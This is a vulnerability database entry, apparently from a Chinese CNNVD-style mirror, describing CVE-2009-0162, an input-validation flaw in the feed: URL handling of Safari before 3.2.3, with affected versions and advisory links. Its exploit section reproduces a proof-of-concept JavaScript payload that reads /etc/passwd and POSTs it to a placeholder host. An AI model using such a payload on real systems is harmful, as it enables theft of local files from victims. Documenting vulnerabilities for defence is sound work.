Apple Safari Cross-Site Scripting Vulnerability

Vulnerability ID: 1117750; Vulnerability type: Cross-site scripting
Published: 2009-05-12; Updated: 2009-06-10
CVE ID: CVE-2009-0162; CNNVD-ID: CNNVD-200905-177
Platform: Multiple; CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/32994
https://www.securityfocus.com/bid/34925
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-177
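|Vulnerability details
Safari is the web browser bundled by default with Apple's operating system. A memory corruption vulnerability exists in the way WebKit in Safari handles SVGList objects; visiting a malicious website can lead to arbitrary code execution. Multiple input validation errors exist in Safari's handling of feed: URLs; visiting a malicious feed: URL can lead to execution of arbitrary JavaScript.
|Exploit (EXP)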
source: http://www.securityfocus.com/bid/34925/info

Apple Safari is prone to multiple input-validation vulnerabilities.

An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website.

Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.

These issues affect versions prior to Safari 3.2.3. 

<summary>On the Cylon baseship, Cavil confronts the last member of the Final Five.
<script>
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open('GET', 'file:///etc/passwd', true);
req.send('');

function processReqChange() {
if (req.readyState == 4) {
contents = req.responseText;
sendit2XSSniper(contents);
}
}
function sendit2XSSniper(stuff){
var req2;
req2 = new XMLHttpRequest();
req2.open('POST', 'http://www.example.com', true);
req2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
req2.send('filename=etcpasswd&filecontents=' + escape(stuff));
}
</script>
</summary>
|Affected products
Apple Safari 3.2.2 for Windows
Apple Safari 3.1.2 for Windows
Apple Safari 3.1.2
Apple Safari 3.1.1 for Windows
Apple Safari 3.1.1
Apple Safari 3.0.4 Beta for Windows
|References

Source: US-CERT
Name: TA09-133A
Link: http://www.us-cert.gov/cas/techalerts/TA09-133A.html
Source: support.apple.com
Link: http://support.apple.com/kb/HT3549
Source: APPLE
Name: APPLE-SA-2009-05-12
Link: http://lists.apple.com/archives/security-announce/2009/May/msg00002.html
Source: APPLE
Name: APPLE-SA-2009-05-12
Link: http://lists.apple.com/archives/security-announce/2009/May/msg00001.html
Source: APPLE
Name: APPLE-SA-2009-05-12
Link: http://lists.apple.com/archives/security-announce/2009/May/msg00000.html
Source: XF
Name: safari-feedurl-code-execution(50476)
Link: http://xforce.iss.net/xforce/xfdb/50476
Source: VUPEN
Name: ADV-2009-1298
Link: http://www.vupen.com/english/advisories/2009/1298
Source: VUPEN
Name: ADV-2009-1297
Link: http://www.vupen.com/english/advisories/2009/1297
Source: SECTRACK
Name: 1022206
Link: http://www.securitytracker.com/id?1022206
Source: BID
Name: 34925
Link: http://www.securityfocus.com/bid/34925
Source: support.apple.com
Link: http://support.apple.com/kb/HT3550
Source: SECUNIA
Name: 35074
Link: http://secunia.com/advisories/35074
Source: SECUNIA
Name: 35056
Link: http://secunia.com/adv